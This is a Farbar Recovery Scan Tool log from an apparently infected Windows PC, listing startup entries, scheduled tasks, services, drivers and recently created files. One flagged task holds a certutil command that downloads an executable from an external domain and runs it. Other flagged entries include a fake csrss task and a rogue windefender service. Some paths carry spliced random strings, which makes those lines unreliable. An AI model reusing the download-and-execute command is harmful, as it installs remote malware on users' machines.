HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [799904 2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2778864 2014-08-06] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM\...\Run: [SoftEther VPN Client UI Helper] => C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [5248312 2019-05-12] (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-08-27] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2109064 2019-11-27] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-11] (Intel Corporation - Software and Firmware Products -> Intel Corporation)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CloudNet] => C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-01-24] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CCleaner Monitoring] => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Policies\...\system: [disablecmd] 0
HKU\S-1-5-18\...\Run: [GarminExpress] => C:\Program Files (x86)\Garmin\Express\express.exe [30860272 2019-06-18] (Garmin International, Inc. -> Garmin Ltd. or its subsidiaries)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\79.0.3945.130\Installer\chrmstp.exe [2020-01-23] (Google LLC -> Google LLC)
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
HKLM\Software\...\Authentication\Credential Providers: [{ACFC407B-266C-8504-8DAE-F3E276336E4B}] -> C:\Windows\system32\AthCredentialProvider.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\Software\...\Authentication\Credential Provider Filters: [{ACFC407B-266C-8504-8DAE-F3E276336E4B}] -> C:\Windows\system32\AthCredentialProvider.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs: ,C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [159480 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SoftEther VPN Client Manager Startup.lnk [2019-05-12]
ShortcutTarget: SoftEther VPN Client Manager Startup.lnk -> C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {043F5EB4-82CE-46AA-BE56-7668C5C64C5E} - System1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
Task: {0760CF23-E27C-42D7-9E44-6B3896E46166} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://theatresearch.xyz/app/app.exe C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe && C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe /31340 <==== ATTENTION
Task: {1DE2EE32-D3F2-49E9-A9B3-B3B665DC515B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {2D417548-BA65-4EE7-8774-0A7D26D81927} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [40432 2019-06-18] (Garmin International, Inc. -> )
Task: {51CC2622-5A74-4047-8C6D-C3C3CC65EC8A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rvice.exe [335416 2020-01-21] (Adobe Inc. -> Adobe)
Task: {5C3781C4-8E63-4EE9-BD6E-23BD81C33BC9} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_321_Plugin.exe [1458232 2020-01-21] (Adobe Inc. -> Adobe)
Task: {905A300B-6470-42D2-87C0-0A406C62E55F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
Task: {973AEEE8-1D02-4786-946B-3A7611DB49FC} - System32\Tasks\HPCustPartic.exe_{497FF387-CFCE-4B3F-9361-4D1F864871FC} => C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPCustPartic.exe [6662792 2018-07-04] (Hewlett Packard -> HP Inc.)
Task: {A4CB1FE6-864E-4AC1-8079-C8F6B56E7208} - System32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE} => C:\Windows\system32\pcalua.exe -a "C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {DD5C372A-1601-4F80-9BD1-91EBB6A059E8} - System1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-01-07] (Google Inc -> Google Inc.)
Task: {E289981D-7DE7-44EA-8295-33A39EFCC113} - System1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-01-07] (Google Inc -> Google Inc.)
Task: {E6660E0C-2898-438C-92D1-1B9BC249F29E} - System32\Tasks\HPCustParticipation HP LaserJet MFP M28-M31 => C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPCustPartic.exe [6662792 2018-07-04] (Hewlett Packard -> HP Inc.)
Task: {EC032B4F-84FF-4698-AA3E-EB8CEC1F95CE} - System32\Tasks\U-9-6-42-1263061080-1218707829-1038753275-4479\{XXIL7BBA-VLUN-1SE5-VAVW-AAH7L2DBI1PZ} => C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c\PortableDeviceClassExtension.exe [0 0000-00-00] (Windows Media Audio AEC for Media Foundation) (Access Denied)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 07 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 07 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{8A644A86-7EBB-4639-9455-DF1016EC069A}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{FF69FF1A-22D7-4392-824F-9C30EFD876FD}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://securedsearch.lavasoft.com/?pr=vmn&id=webcompa&ent=hp_WCYID10463__191020
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_241\bin\ssv.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_241\bin\jp2ssv.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]

FireFox:
========
FF DefaultProfile: zzgehp0c.default-1579206376147
FF ProfilePath: C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGiofiles\zzgehp0c.default-1579206376147 [2020-02-06]
FF Extension: (Adaware Secure Search) - C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\@newtab-omni.xpi [2019-10-20]
FF HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_321.dll [2020-01-21] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\dtplugin\npDeployJava1.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\plugin2\npjp2.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_321.dll [2020-01-21] (Adobe Inc. -> )
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-12-02] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default [2020-01-26]
CHR Notifications: Default -> hxxps://www.youtube.com
CHR Extension: (Prezentácie) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-01-07]
CHR Extension: (SEOquake) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc [2020-01-08]
CHR Extension: (Dokumenty) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-01-08]
CHR Extension: (Disk Google) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-01-08]
CHR Extension: (YouTube) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-01-08]
CHR Extension: (Tabuľky) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-01-07]
CHR Extension: (Dokumenty Google v režime offline) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-01-26]
CHR Extension: (Tag Assistant (by Google)) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\kejbdjndbnbjgmefkgdddjlbokphdefk [2019-05-08]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-01-08]
CHR Extension: (Gmail) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-08]
CHR Extension: (Chrome Media Router) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-01-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx <not found>

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-08-26] (Apple Inc. -> Apple Inc.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [105120 2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
R2 ibtsiva; C:\Windows\system32\ibtsiva.exe [184072 2017-01-13] (Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [359680 2019-07-12] (Intel Corporation -> Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268968 2017-11-12] (Intel(R) Wireless Connectivity Solutions -> )
R2 SEVPNCLIENT; C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [5248312 2019-05-12] (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [339456 2013-08-16] (IDT, Inc.) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2017-01-08] (Microsoft Windows -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [2079744 2020-01-24] () [File not signed]
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare Technology Co.,Ltd -> Wondershare)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3758760 2017-11-12] (Intel(R) Wireless Connectivity Solutions -> Intel® Corporation)
S2 Main Service; C:\Program Files (x86)\MachinerData\IdealDVDCopy.exe 1 [X]
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\MobileGo\DriverInstall.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 amdhub30; C:\Windows\system32\drivers\amdhub30.sys [108768 2016-01-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, INC.)
S3 amdhub31; C:\Windows\system32\drivers\amdhub31.sys [141528 2016-02-26] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc.)
S3 amdxhc; C:\Windows\system32\drivers\amdxhc.sys [229088 2016-01-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, INC.)
S3 amdxhc31; C:\Windows\system32\drivers\amdxhc31.sys [440536 2016-02-26] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc.)
S3 ampa; C:\Windows\system32\ampa.sys [38320 2016-12-25] (CHENGDU AOMEI Tech Co., Ltd. -> )
R3 AmUStor; C:\Windows\System32\drivers\AmUStor.SYS [118184 2018-05-14] (Alcorlink Corp. -> )
R3 btmaudio; C:\Windows\System32\drivers\btmaud.sys [101352 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
S3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [158696 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [1560552 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 EtronHub3; C:\Windows\System32\Drivers\EtronHub3.sys [65408 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 EtronSTOR; C:\Windows\System32\Drivers\EtronSTOR.sys [39296 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 EtronXHCI; C:\Windows\System32\Drivers\EtronXHCI.sys [94208 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 FLxHCIh; C:\Windows\system32\drivers\FLxHCIh.sys [88016 2016-12-09] (Fresco Logic Inc -> Fresco Logic)
S3 IaNVMe; C:\Windows\system32\drivers\IaNVMe.sys [113160 2016-11-04] (Intel(R) NVMe Windows Driver -> Intel Corporation)
R0 IaNVMeF; C:\Windows\System32\drivers\IaNVMeF.sys [35848 2016-11-04] (Intel(R) NVMe Windows Driver -> Intel Corporation)
S3 IaRNVMe; C:\Windows\system32\drivers\IaRNVMe.sys [592408 2016-01-22] (Intel(R) Rapid Storage Technology Enterprise -> Intel Corporation)
R0 IaRNVMeF; C:\Windows\System32\drivers\IaRNVMeF.sys [36888 2016-01-22] (Intel(R) Rapid Storage Technology Enterprise -> Intel Corporation)
R3 ibtusb; C:\Windows\System32\DRIVERS\ibtusb.sys [206344 2017-06-27] (Intel(R) Wireless Connectivity Solutions -> Intel Corporation)
R3 L1C; C:\Windows\System32\DRIVERS\L1C63x64.sys [125048 2016-01-29] (Rivet Networks LLC -> Qualcomm Atheros, Inc.)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [199760 2016-11-29] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation)
S3 mvusbews; C:\Windows\System32\Drivers\mvusbews.sys [20480 2012-12-24] (Microsoft Windows Hardware Compatibility Publisher -> Marvell Semiconductor, Inc.)
R3 Neo_VPN; C:\Windows\System32\DRIVERS\Neo_0061.sys [38088 2019-05-12] (SoftEther Corporation -> SoftEther Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\Netwsw02.sys [3427848 2017-11-08] (Intel(R) Wireless Connectivity Solutions -> Intel Corporation)
S3 ocznvme; C:\Windows\system32\drivers\ocznvme.sys [99592 2016-06-10] (Toshiba America Electronic Components, Inc. -> TOSHIBA CORPORATION)
R0 ocztrimfilter; C:\Windows\System32\drivers\ocztrimfilter.sys [29064 2016-06-10] (Toshiba America Electronic Components, Inc. -> TOSHIBA CORPORATION)
S3 rusb3hub; C:\Windows\system32\drivers\rusb3hub.sys [114568 2012-08-27] (Renesas Electronics Corporation -> Renesas Electronics Corporation)
S3 rusb3xhc; C:\Windows\system32\drivers\rusb3xhc.sys [230280 2012-08-27] (Renesas Electronics Corporation -> Renesas Electronics Corporation)
R3 SEE; C:\Windows\System32\drivers\see.sys [49864 2019-05-12] (SoftEther Corporation -> SoftEther Corporation)
S3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [41512 2017-12-07] (Intel Corporation -> )
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [33008 2013-05-02] (Synaptics Incorporated -> Synaptics Incorporated)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 STHDA; C:\Windows\System32\DRIVERS\stwrt64.sys [551936 2013-08-16] (Microsoft Windows Hardware Compatibility Publisher -> IDT, Inc.)
S3 tilfilter; C:\Windows\system32\drivers\TIxHCIlfilter.sys [17672 2015-02-11] (Texas Instruments, Inc. -> Texas Instruments, Inc.)
S3 tiufilter; C:\Windows\system32\drivers\TIxHCIufilter.sys [23304 2015-02-11] (Texas Instruments, Inc. -> Texas Instruments, Inc.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-02-01] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 VUSB3HUB; C:\Windows\system32\drivers\ViaHub3.sys [221696 2015-08-20] (Microsoft Windows Hardware Compatibility Publisher -> VIA Technologies, Inc.)
S3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [23272 2020-01-22] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [File not signed]
S1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-01-25] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
S3 xhcdrv; C:\Windows\system32\drivers\xhcdrv.sys [294912 2015-08-20] (Microsoft Windows Hardware Compatibility Publisher -> VIA Technologies, Inc.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 MBAMService; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-02-06 21:28 - 2020-02-06 21:29 - 000028881 _____ C:\Users\Jomko\Desktop\FRST.txt
2020-02-06 21:27 - 2020-02-06 21:23 - 002279424 _____ (Farbar) C:\Users\Jomko\Desktop\FRST64.exe
2020-02-06 21:24 - 2020-02-06 21:28 - 000000000 ____D C:\FRST
2020-02-06 20:58 - 2020-02-06 20:58 - 000000000 ___RD C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGiStart Menu\Programs\BT Devices
2020-01-26 19:07 - 2020-01-26 19:07 - 000077280 _____ (Bitvise Limited) C:\Windows\system32\BvEventSource.exe
2020-01-26 19:07 - 2020-01-26 19:07 - 000076336 _____ (Bitvise Limited) C:\Windows\MstscTitle64.dll
2020-01-26 19:07 - 2020-01-26 19:07 - 000069168 _____ (Bitvise Limited) C:\Windows\MstscTitle32.dll
2020-01-26 19:07 - 2020-01-26 19:07 - 000002421 _____ C:\Users\Public\Desktop\Bitvise SSH Client.lnk
2020-01-26 19:07 - 2020-01-26 19:07 - 000002421 _____ C:\ProgramData\Desktop\Bitvise SSH Client.lnk
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\Users\Jomko\AppData\Local\Bitvise
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitvise SSH Client
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\Program Files (x86)\Bitvise SSH Client
2020-01-26 15:54 - 2020-01-26 15:54 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Google
2020-01-25 00:49 - 2020-01-25 00:49 - 000000000 ____D C:\Windows\pss
2020-01-25 00:35 - 2020-01-25 00:35 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2020-01-25 00:24 - 2020-01-25 00:24 - 000003158 _____ C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE}
2020-01-25 00:22 - 2020-01-25 00:45 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-01-25 00:21 - 2020-01-25 00:21 - 000000000 ____D C:\Program Files\Malwarebytes
2020-01-24 21:58 - 2020-01-25 00:32 - 000000150 _____ C:\Windows\Reimage.ini
2020-01-24 21:56 - 2020-01-24 21:56 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\EpicNet Inc
2020-01-24 21:54 - 2020-01-24 21:54 - 000389624 _____ C:\Windows\Minidump\012420-10249-01.dmp
2020-01-22 23:59 - 2020-01-22 23:59 - 000001617 _____ C:\Users\Jomko\Desktop\Kodi.lnk
2020-01-22 23:07 - 2020-01-26 18:25 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Kodi
2020-01-22 23:06 - 2020-01-22 23:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kodi
2020-01-22 23:06 - 2020-01-22 23:06 - 000000000 ____D C:\Program Files\Kodi
2020-01-22 22:54 - 2020-01-24 21:00 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\vlc
2020-01-22 22:51 - 2020-01-22 22:51 - 000000840 _____ C:\Users\Public\Desktop\VLC media player.lnk
2020-01-22 22:51 - 2020-01-22 22:51 - 000000840 _____ C:\ProgramData\Desktop\VLC media player.lnk
2020-01-22 22:51 - 2020-01-22 22:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-01-22 22:50 - 2020-01-22 22:50 - 000000000 ____D C:\Program Files\VideoLAN
2020-01-22 20:46 - 2020-01-22 20:47 - 000000000 ___SD C:\32788R22FWJFW
2020-01-22 20:28 - 2020-01-22 20:28 - 000034489 _____ C:\ComboFix.txt
2020-01-22 17:55 - 2020-01-22 20:47 - 000000000 ____D C:\Windows\erdnt
2020-01-22 17:29 - 2020-01-22 17:33 - 142164912 _____ (Microsoft Corporation) C:\Users\Jomko\Downloads\MSERT.exe
2020-01-22 17:20 - 2020-01-22 17:24 - 000000000 ____D C:\ProgramData\ESET
2020-01-22 17:20 - 2020-01-22 17:24 - 000000000 ____D C:\Program Files\ESET
2020-01-22 17:17 - 2020-01-22 17:17 - 005504960 _____ (ESET) C:\Users\Jomko\Downloads\eset_smart_security_premium_live_installer_rt_sk.exe
2020-01-22 15:00 - 2020-01-22 15:00 - 000335528 _____ C:\Windows\Minidump\012220-10062-01.dmp
2020-01-22 14:31 - 2020-01-22 14:31 - 000000000 __SHD C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c
2020-01-22 14:31 - 2020-01-22 14:31 - 000000000 ____D C:\Windows\system32\Tasks\U-9-6-42-1263061080-1218707829-1038753275-4479
2020-01-22 14:30 - 2020-01-24 19:52 - 002079744 ____H C:\Windows\windefender.exe
2020-01-22 14:30 - 2020-01-22 14:30 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
2020-01-22 14:30 - 2020-01-22 14:30 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
2020-01-22 14:29 - 2020-02-06 20:58 - 000003496 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-01-22 14:29 - 2020-02-06 20:58 - 000003182 _____ C:\Windows\system32\Tasks\csrss
2020-01-22 14:29 - 2020-01-22 17:00 - 000000000 ___HD C:\Windows\rss
2020-01-22 14:29 - 2020-01-22 14:30 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-01-22 14:29 - 2020-01-22 14:30 - 000629984 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-01-22 14:28 - 2020-01-22 14:28 - 000000000 _____ C:\Users\Jomko\Documents\codec m3u vlc
2020-01-22 13:41 - 2020-01-22 14:25 - 000000150 _____ C:\Windows\restoro.ini
2020-01-22 12:39 - 2020-01-22 22:40 - 000000000 ____D C:\Program Files (x86)\VideoLAN
2020-01-22 10:49 - 2020-01-22 14:41 - 000000000 ____D C:\Program Files\Mozilla Firefox
